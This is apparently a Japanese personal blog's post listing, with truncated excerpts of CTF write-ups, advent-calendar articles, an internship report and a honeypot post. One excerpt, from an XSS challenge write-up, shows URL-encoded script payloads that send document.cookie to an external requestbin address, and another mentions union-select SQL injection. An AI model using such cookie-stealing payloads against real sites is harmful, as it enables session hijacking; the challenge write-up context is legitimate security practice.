この記事はkb advent calendar4日目の記事です。 https://adventar.org/calendars/9546 gist.github.com
njs この記事はkb Advent Calendar 2020 12日目の記事です。 https://adventar.org/calendars/5280 軽く動的なサーバサイドのコードを動かしたいけど、サーバーを立ち上げるのにnodejsをインストールしてデーモン化とか面倒… とはいえphp/php-fpmで書くのも…
1日目にwebだけ参加していました。 Spy dbに存在するアカウント名を当てる問題。 hashの計算をしているみたいだったので、length extensionか何かかなと思い放置していたらチームの人が解いてくれてました。 アカウントが存在する場合の方がhashの計算に時間…
都内の温泉施設で参加してました。 あまり解けなかったのが残念でした。 Option-Cmd-U punycodeをいい感じにする問題だと思い、punycodeについて調べていた。
参加してました。 containers foremostして出てきたpngの文字列を合わせるだけだった 最初と最後の文字列は切れてたけどどうせcと}だろうと思ってそのまま投げたら通ったので良かった [warmup] Ramen SQL injection。 union selectでinformation_schemaからt…
前回の流れで こちらをやっていました。 現状出ている34問分が終わったのと、writeupが公開可なようだったのでついでに上げてみました。 25までの解答が消えてしまいこれを書くにあたって解き直していたので、cookieの送信先が変わってるのはそのせいです。 …
暇なのでこちらをやってました XSS Challenge (by y0n3uchy) 解法を公開しても良いとのことだったので、稚拙ですがwriteupを書きました。 現状出ている問題のみですが、追加され次第更新したいなと思います。 gist.github.com
いくつか参加して簡単な問題だけ解いてました。 Square CTF ratingがスゴかった… dot-n-dash メチャクチャ雑にデコード処理を書いた function _decode(input) { let q = input.split(".").map(a=>a.length) let b = Array(Math.max.apply(null, q)).fill("0"); q.m…
色々あって色々アレでした。 一度も更新しないまま2018年も終わりかけているのでとりあえず… SECCON 2018 Online CTF 参加してました チームで参加したため、自分として解けた問題がとても少ないですが 以下writeupです。 Runme こういう、stringsではflagは…
楽しかったです 全部解けるようがんばります…がんばりたい… 2 やるだけ q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E 3 やるだけ q=%22%3E%3Cscript%3Elocation.href=%22https://reques…
gist.github.com
大分間が空きましたが元気です。がんばります 色々あって引きこもってました。 現在もわりと引きこもってます。色々あって今にいたります 年末に風邪をこじらせている間にいつの間にか年も越して 気がつけば2月… 最近はCTFなどはにわかに参加しているくらい…
K氏とチーム名「zoi」で参加してました。 今回は諸事情で学生枠でなく、一般枠で参加しました。 チーム名は時期的に被るんじゃないかなと思ってましたが、やはり被りました。ローマ字の方です。 初参加でした。 最終結果はメモってなかったのでアレなのです…
ABCTFの簡単なのをダラダラやっていて、あとは土日でやろう… と楽しみに思っていたのですが、いつの間にか終わっていたので、 少し凹んだ。 Writeupがわりと寂しくなっていてショボイですが、覚え書き。 Caesar Salad - Crypt 10 xyzqc{t3_qelrdeq_t3_k33a3a_l…
ブログです。 最近はわりと自堕落的に、 本を読んだり、落書きをしたり、 Unityで遊んだり、ネットワークで遊んだり、 Pythonで遊んだり、Cで遊んだり、 してました。遊んでばっかりだな… それで自分の底の浅さや至らなさなどを痛感したり、 頑張っていきた…
ピクシブのインターンに 行ってきました。5日間。 楽しかったです。 pixiv自体わりとよく使っていて、インターンもとても行きたかった けれど、過去のインターン参加ブログなどを拝見していると自分が行ける感じでもなく、 ダメ元で応募してみたところ受かっ…
和風(WAF〜)CTFというとてもナイスなデザインのCTFであった 全体的に初心者向けであったので、メチャンコ初心者な自分にも楽しめた 稚拙ながら、とりあえず解けた問題のwriteupというか感想というか なものを書いてみました。 101 image level 1 つなげるだけ 111…
書こうと思ってた日にびっくりするほど寝てしまったので適当に書きました。 Let's Encrypt使った話 この記事は OIC ITCreate Club Advent Calendar 2015 16日目(12/16)の記事です。 Let's Encryptにメール送って返ってきたのをしばらく放置していたのですが…
暇つぶしアセンブラ 今日も誰も書かないので、適当に。 もう半分くらい自分の記事になってきた… あとだんだん書くネタが無くなってきたこの頃。 この記事は OIC ITCreate Club Advent Calendar 2015 12日目(12/12)の記事です。 セキュリティキャンプ・キャラ…
gist.github.com
slackにアップされてる画像からGPS情報取得するやつ この記事は OIC ITCreate Club Advent Calendar 2015 9日目(12/9)の記事です。 slackでアップロードされる画像に位置情報があるのがすごく気になって いたけれど、誰もつっこまないし、 誰もアドベントカ…
gist.github.com
シンプルでキュートなハニーポットを作る この記事は OIC ITCreate Club Advent Calendar 20152015 4日目(12/4)の記事です。 3日目の記事は、紅き衝動さんのDocker触ってみよう!– 萌え萌えブログ///キャワワ(^^)/でした。 今日はハニーポット的なものを作ったの…
スゴイ内輪でやってるCTF的なやつの答え合わせ的なやつ 自分が作ったのを自分でWriteup書くという自作自演感。 初心者以下の自分が初めての人用にと作ったのでしょうもない上にあまり面白くもないと思うので、身内用に。 1. ba_ev.zip zipの中に auth.pcap p…